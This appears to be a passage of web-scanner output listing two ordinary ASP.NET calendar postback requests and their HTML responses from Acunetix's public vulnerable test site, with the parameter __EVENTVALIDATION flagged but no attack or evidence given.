Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1135 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,135 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8437&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAAGRfVB9sIZGRkkjheMQgbciQyTyr0dPBnQ0XEQMY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKi%2Frq1BALQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBate1G7AVbvjIJQopNn1iD9nn7eN
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:04:32 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAAGRfVB9sIZGRkkjheMQgbciQyTyr0dPBnQ0XEQMY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKi/rq1BALQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBate1G7AVbvjIJQopNn1iD9nn7eN" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:White" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1109 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,109 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8469&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgAAUWT6INsIZGRk9gpiKywKjLmGEQG1Sfa8xTNo%2B2k%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKI4uisAQLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJ87uRmMIW1IC7W0GOItwspv2xXV0%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:19:11 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgAAUWT6INsIZGRk9gpiKywKjLmGEQG1Sfa8xTNo+2k=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKI4uisAQLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJ87uRmMIW1IC7W0GOItwspv2xXV0=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:White" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
